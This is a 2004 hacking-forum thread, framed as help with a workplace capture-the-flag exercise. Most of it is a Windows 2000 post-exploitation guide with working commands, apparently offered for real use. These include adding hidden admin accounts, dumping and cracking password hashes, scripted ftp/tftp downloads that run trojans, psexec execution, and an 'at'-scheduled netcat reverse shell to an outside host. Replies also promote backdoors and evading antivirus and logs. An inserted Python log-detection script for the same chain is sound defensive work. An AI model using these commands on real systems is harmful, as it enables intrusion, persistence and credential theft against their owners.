We have a training exercise going on here at work, something like "capture the flag".
I was able to obtain a remote command shell with system-level privileges from a W2K box, but I don't know what to do next.
My thoughts were maybe running pwdump3e to dump the hashes, but I don't know how to run that remotely, because I don't have the admin password yet.
I was able to use "enum" to enumerate usernames from my target machine, but I don't have any passwords.
The ports that are open on my target machine: 25, 80, 135, 139, 443, 445, 1025, 1026, 3389.
I also thought about mapping a share remotely, and then poking around on the target machine, to see if I can find the hidden flags, but I think I have to have a valid username and password to do that.
The goal of this exercise is for me to be able to gain additional privileges (i.e. administrator) and find files and scripts with passwords, network design, or any useful documents.
Any ideas?
brOmstar
Aug 18 2004, 01:33 PM
Simply add a new user to the admin group and log in at 3389 with a terminal client; now u have full admin privileges and a GUI.
mrBob
Aug 18 2004, 01:33 PM
You can upload pwdump to the remote computer with ftp.exe (just do a forum search and you'll see how to use it). You might want to install an FTP server for easy browsing, or a VNC.
Or can't you run files with your privileges?
niko.noname
Aug 18 2004, 01:34 PM
Learn about the NET command, exactly how to create a user account and a share.
hint: net help
Greetz
Terminal
Aug 18 2004, 01:37 PM
You got a command shell with system-level privileges, then just add an admin account, and as 139 and 445 are open, that means NetBIOS sharing is open. Then in Explorer type \\victimpc\c$ and enter the user/pass of the admin account u created, and u are in c$ with read/write access. Similarly d$, e$ for other drives.
annointed3
Aug 18 2004, 02:02 PM
Thank you all for your help. I'm going to the lab now and try some of your suggestions. I'll let you know how it turns out.
I also used a tool to check for "joe" accounts, and I think I found a few, but what exactly is a "joe account"?
Carny
Aug 18 2004, 03:07 PM
QUOTE (brOmstar @ Aug 18 2004, 01:33 PM)
Simply add a new user to the admin group and log in at 3389 with a terminal client; now u have full admin privileges and a GUI.
Stupid question... how can I add a new user? What do I need? What is a terminal client?
KuerbY
Aug 18 2004, 03:11 PM
Use pwdump and dump the hashes to hashes.txt and download the txt file. Now use LC5, or when you have RainbowCrack tables, rcrack; normally you can crack all passwords. Or you add a new user with admin rights, or you install a backdoor like radmin. You have the choice.
Carny
Aug 18 2004, 03:25 PM
QUOTE (KuerbY @ Aug 18 2004, 03:11 PM)
Use pwdump and dump the hashes to hashes.txt and download the txt file. Now use LC5, or when you have RainbowCrack tables, rcrack; normally you can crack all passwords. Or you add a new user with admin rights, or you install a backdoor like radmin. You have the choice.
But how can somebody start or transfer r_admin without exec rights?
brOmstar
Aug 18 2004, 04:42 PM
grml, u have system rights; the rest is so simple, but it depends on what u want..
@cmdline with sys-privileges type:
net user username password /add
net localgroup administrators username /add
(if domain controller, add) net group "domain admins" username /add
After that is done, simply open the Remote Desktop client on ur own box and connect to the IP (included in XP / downloadable from MS for 2000 / under *nix use rdesktop as client).
The logon screen appears; use ur created account -> u r admin with a full Remote Desktop session. What more do u want?
Now u can do anything u can do on ur own system!!
@carny u r the system, u can do anything.
annointed3
Aug 18 2004, 05:25 PM
Thanks again.
I used the tips given above and created a new user and added that user to the administrators group. I then connected to C$ and was able to view files on my target system. My co-worker, who set up this lab, had files on the target system that contained usernames and passwords, and I was able to find those files.
Next, I need to figure out how to upload tools. Can you do that with the remote administration utility? I'm getting ready to try that now.
Also, do you all know of any good backdoors for W2K?
Thanks again for your help.
Terminal
Aug 18 2004, 05:34 PM
Dude, think a little bit. When u are connected to c$, just copy ur trojan server and paste it somewhere and execute it from a DOS box. That's all.
mrBob
Aug 18 2004, 06:52 PM
QUOTE (vicky @ Aug 18 2004, 07:34 PM)
Dude, think a little bit. When u are connected to c$, just copy ur trojan server and paste it somewhere and execute it from a DOS box. That's all.
True, but make sure you execute the backdoor from the cmd shell, not from the Explorer view of the share (using double-click), since that'll make the backdoor run on your computer.
B3T4
Aug 18 2004, 07:08 PM
QUOTE (annointed3 @ Aug 18 2004, 01:27 PM)
Hi,
We have a training exercise going on here at work, something like "capture the flag".
Then why are u asking all these questions? I mean, aren't they teaching u anything?
Besides, u ask us what to do next; I think u need to capture the flag...
And besides, if u have (created) an admin account and u can access it using a remote screen, why do u need a backdoor then? U can do everything possible then, so capture the so-called flag.
flashb4ck
Aug 19 2004, 02:38 AM
Nobody said that u can add an echo file:
echo open blablaftpserver PORT >> c:\whereuwant.txt
echo user blaaaa >> c:\whereuwant.txt
echo pass böaaa >> c:\whereuwant.txt
echo BINARY >> c:\whereuwant.txt
echo get trojan.exe >> c:\whereuwant.txt
echo get trojan.dll >> c:\whereuwant.txt
echo quit >> c:\whereuwant.txt
hehe
It'll only work if ftp.exe is available.
hf with capturing the logs u have left ^^
edit!: another example ;D
Sex is like hacking: u get in, u get out, and u hope that u didn't leave something behind that can be traced back to u ^^
gr€€tZ fL4Shb4Ck
illwill
Aug 19 2004, 04:32 AM
Might as well post it here since the trial members can't see it in the other forums.
QUOTE
Tutorial started fall of 2003.
So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt' and you don't know what the (filtered) a command prompt is, cuz you don't know shit about DOS and can't do anything without a pretty point-n-click GUI interface, and need to get your UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.
+++ r00tin' NT
0x01. The Basics
+ What are net commands?
+ What are some net commands?
+ What is NetBIOS?
+ Creating a local admin account.
+ How to transfer files to and from.
+ How do I execute those files remotely?
0x01. The Basics - What are net commands?
`````````````````````````````````````````
What are net commands exactly? Net commands are commands used to show information regarding a server or network, which can include information on the servers, networks, shares, and connections. Other commands let you edit user accounts, groups, and other configuration types.
0x01. The Basics - What are some net commands?
``````````````````````````````````````````````
What are some net commands? There are various net commands which you can use to view server info. Some of these would include the ever-popular NET use, NET share and NET view. But these aren't the only net commands available. There is a wide variety of net commands, and they are as follows:
- NET Accounts
- NET Computer
- NET Config Server
- NET Config Workstation
- NET Continue
- NET File
- NET Group
- NET Help
- NET Helpmsg
- NET Localgroup
- NET Name
- NET Pause
- NET Print
- NET Send
- NET Session
- NET Share
- NET Statistics Server
- NET Statistics Workstation
- NET Stop
- NET Time
- NET Use
- NET User
- NET Ver
- NET View
Net commands are great ways to spy on hacked Windows NT servers because you're checking on the network's status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use, because they each do a certain thing which can be used for attacking: NET View, which is used to display a list of resources being shared on the attacked computer; NET Share, which will display a list of information about all the resources that are being shared on the attacked computer and can also be used to create network shares; and last but not least NET Use, which will display a list of connected computers and also has options for connecting and disconnecting from previously made shares. With those 3 commands, you have the ability to do an attack called NetBIOS hacking.
0x01. The Basics - Creating a local admin account and a backup shell.
``````````````````````````````````````````````````
First off, I always start off with making myself an admin on the computer, just in case the shell is lost.
Add your name to the admin group:
net user [username] [password] /add
net localgroup administrators [username] /add
( C:\WINNT\System32>net user GOD 0wned /add )
( C:\WINNT\System32>net localgroup administrators GOD /add )
***From muts from whitehat.co.il 8/19/04
Once I had the shell, I had to create some "Backup Shells" in case the connection gets severed. There's nothing worse than losing the only single connection to a penetrated machine… I did this using the "at" command, sending myself a NetCat shell every 15 minutes. I found myself smiling every 15 minutes.
C:\WINDOWS>time
The current time is: 0:18:13.01
Enter the new time:

C:\WINDOWS>at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
Added a new job with job ID = 1
0x01. The Basics - How to transfer files to and from.
`````````````````````````````````````````````````````
Now's a good time to transfer some files. Here are some good methods of transferring files that I use:
1. Open the C: drive up for file sharing/transferring:
C:\>NET SHARE shareME=C:
which u can connect to in your browser window as \\victimsIP\shareME, or type in YOUR DOS prompt:
c:>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (u need to have a TFTP server running on your computer):
http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
TFTP [-i] YOURIP [GET | PUT] source [destination]
C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. From a command prompt, echo ftp commands into a .bat file and execute it:
echo user <USERNAME> >>c:\$.tmp
echo <PASSWORD> >>c:\$.tmp
echo lcd c:\windows >>c:\$.tmp
echo binary >>c:\$.tmp
echo get <FILENAME.EXE> >>c:\$.tmp
echo quit >>c:\$.tmp
ftp -v -i -n -s:c:\$.tmp <FTP SITE> c:\$$.tmp
<FILENAME.EXE>
del c:\$.tmp
del c:\$$.tmp
4. I have created a command-line web downloader which allows you to grab a file from a website and execute it. It's more reliable when transferring files (ftp servers have timeouts, TFTP uses UDP packets so it fails a lot): http://illmob.org/stuff/cmdget.zip
u need to get it on the server using the above choices, then you can use it normally:
cmdget http://blah.com/trojan.exe c:\0wned.exe
"Well, how would I get your exe onto the hacked server, illwill, u dumbass?" you might ask. Well, you could use this program brainbuster made... basically it's a GUI front-end to create a debug script that you can paste into a shell line by line, which will create a bat file that will re-compile the script into an .exe: http://illmob.org/stuff/exe2txt.zip
***Added from 101 on GSO forums 5/31/04
A small tip now if you wanna use SecureCRT in listening mode, to be able then to copy/paste the huge .txt without problems:
-*example*-
your localip = 192.168.0.2
Run a listening netcat1:
nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT, do a simple telnet connection to 192.168.0.2:12345 (you'll have a shell, of course, on your own computer through SecureCRT). Now open another listening netcat2 through this local sCRT shell; you'll finally be able to copy/paste this huge txt if a victim spawns a shell to this netcat2.
*****
*I would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it, like file transfers.. You would start nc listening on a port, and then on your computer:
c:\>nc (vic_ip) (vic_port) < file.exe
Method #2: ftp downloading. Change the ftp.blah.com to your own ftp+dir and add your username/pass.
-------------------- SNIP----------------------
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
------------------END SNIP----------------------
Method #3: tftp downloading. You need a tftp server running on your own machine; change the yourserver.com to your IP or DNS name.
-------------------- SNIP----------------------
tftp -i yourserver.com get yourfile.exe && start yourfile.exe
------------------END SNIP----------------------
0x01. The Basics - How do I execute those files remotely?
`````````````````````````````````````````````````````````
Having trouble trying to execute files remotely? Try PSEXEC:
http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/
psexec -u [username] -p [password] [command]
If I created a user "GOD" with the password "0wn3d":
C:\>psexec -u GOD -p 0wn3d blah.exe
or, if you wanna have their TFTP connect back to u and retrieve a file:
c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
NOTE: Psexec will only work if you add an administrator user first, and if the computer doesn't have remote administration disabled, or one of the ports firewalled out. Or try RemoExec:
http://securityfriday.com/ToolDownload/Rem...emoxec_doc.html
Remoxec executes a program using DCOM. Just supply an IP, USER, PASS, and the EXE you wanna execute.
This is a working textfile that I have been kicking around; I'll keep adding to it sooner or later when I get some more time. -peace illwill
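Added example, not part of the thread or of illwill's tutorial: the defender's view of the same chain. brOmstar's post and the tutorial above both describe the sequence "net user /add -> net localgroup administrators /add -> scripted ftp/tftp download -> at-scheduled callback shell". Each step leaves a Security-log event, and the script below flags that chain. It assumes events arrive already parsed into dicts (a real collector gives EVTX/XML or CSV); the sample events, hostnames and IPs are constructed. Event IDs are the Vista+ numbers, with the Windows 2000/2003 equivalents a W2K box would actually write noted in comments.

```python
"""
Detection logic for the activity chain this thread walks through: a SYSTEM-level
shell creates a local user, adds it to Administrators, pulls tools down with
scripted ftp / tftp -i GET, and schedules a callback shell with `at`.
The events below are CONSTRUCTED samples in a simplified, already-parsed dict
form (an assumption; a real collector hands you EVTX/XML or CSV), not real logs.
"""
from datetime import datetime

# Windows Security event IDs (Vista+ numbering). The Windows 2000/2003 IDs a
# W2K box would actually write are noted next to each.
USER_CREATED = 4720               # legacy 624: user account created
LOCAL_GROUP_MEMBER_ADDED = 4732   # legacy 636: member added to security-enabled local group
PROCESS_CREATED = 4688            # legacy 592: new process created (needs process-tracking audit)
SCHEDULED_TASK_CREATED = 4698     # legacy 602: scheduled task created

ADMIN_GROUPS = {"administrators", "domain admins"}

# Constructed sample events: the thread's sequence plus a benign helpdesk action.
SAMPLE_EVENTS = [
    {"time": "2004-08-18 13:40:02", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM", "target": "GOD"},
    {"time": "2004-08-18 13:40:05", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM",
     "group": "Administrators", "member": "GOD"},
    {"time": "2004-08-18 13:45:10", "id": 4688, "subject": "GOD",
     "cmdline": "ftp -v -i -n -s:c:\\$.tmp ftp.example.invalid"},
    {"time": "2004-08-18 13:46:30", "id": 4688, "subject": "GOD",
     "cmdline": "tftp -i 10.0.0.5 GET tool.exe c:\\tool.exe"},
    {"time": "2004-08-18 13:50:00", "id": 4698, "subject": "GOD",
     "command": "nc.exe -v host.example.invalid 443 -d -e cmd.exe"},
    {"time": "2004-08-18 09:00:00", "id": 4720, "subject": "CORP\\helpdesk", "target": "jsmith"},
    {"time": "2004-08-18 09:00:30", "id": 4732, "subject": "CORP\\helpdesk",
     "group": "Remote Desktop Users", "member": "jsmith"},
    {"time": "2004-08-18 09:05:00", "id": 4688, "subject": "jsmith", "cmdline": "ftp ftp.example.invalid"},
]


def _t(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def _exe_name(cmdline):
    """Basename of the first token, lower-cased, tolerant of Windows paths and .exe."""
    first = cmdline.split()[0].lower().replace("\\", "/").rsplit("/", 1)[-1]
    return first[:-4] if first.endswith(".exe") else first


def find_new_admin_accounts(events, window_seconds=600):
    """Accounts created and then added to an admin group within the window.
    A creator of SYSTEM is the strongest signal: interactive admins, not the
    SYSTEM account, normally create users."""
    created = {e["target"]: e for e in events if e["id"] == USER_CREATED}
    hits = []
    for e in events:
        if e["id"] != LOCAL_GROUP_MEMBER_ADDED or e["group"].lower() not in ADMIN_GROUPS:
            continue
        c = created.get(e["member"])
        if c is None:
            continue
        delta = (_t(e) - _t(c)).total_seconds()
        if 0 <= delta <= window_seconds:
            hits.append({"user": e["member"], "created_by": c["subject"],
                         "seconds_between": delta,
                         "by_system": c["subject"].upper().endswith("SYSTEM")})
    return hits


def find_scripted_transfers(events):
    """Flag the thread's file-pull tricks: ftp driven by a -s: script file, tftp -i GET."""
    hits = []
    for e in events:
        if e["id"] != PROCESS_CREATED:
            continue
        exe = _exe_name(e["cmdline"])
        tokens = e["cmdline"].lower().split()
        if exe == "ftp" and any(t.startswith("-s:") for t in tokens):
            hits.append({"subject": e["subject"], "kind": "ftp-script", "cmdline": e["cmdline"]})
        elif exe == "tftp" and "-i" in tokens and "get" in tokens:
            hits.append({"subject": e["subject"], "kind": "tftp-get", "cmdline": e["cmdline"]})
    return hits


def find_callback_tasks(events):
    """Flag scheduled tasks whose command spawns a shell (the `at ... nc -e cmd.exe` trick)."""
    return [{"subject": e["subject"], "command": e["command"]}
            for e in events if e["id"] == SCHEDULED_TASK_CREATED
            and ("cmd.exe" in e["command"].lower() or "nc.exe" in e["command"].lower())]


def analyze(events):
    """Run all checks over the events in time order and return findings by category."""
    ordered = sorted(events, key=_t)
    return {"new_admins": find_new_admin_accounts(ordered),
            "transfers": find_scripted_transfers(ordered),
            "callback_tasks": find_callback_tasks(ordered)}


if __name__ == "__main__":
    for category, hits in analyze(SAMPLE_EVENTS).items():
        print(f"{category}: {len(hits)} finding(s)")
        for h in hits:
            print("  ", h)
```

Process-creation events only carry a command line if process-tracking auditing is on, which is why the tutorial's ftp -s: and tftp -i tricks are so quiet on a default W2K install; the user-creation and group-change events, by contrast, are written whenever account-management auditing is enabled, and the created-then-promoted pair seconds apart under SYSTEM is the cheapest, most reliable signal in the whole chain.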
Yorn
Aug 19 2004, 05:58 AM
htaver2.zip might still be on illwill's site. AFAIK, it's still working.
On Sept 15th, this will have been out for officially one year without a fix. Much easier than tftp and ftp and etc. It can also be modded to get around AV, but I'll leave that learning up to the reader. Or I might come up with ver3 sometime.
What's great is you can replace test.exe with any exe of your choice.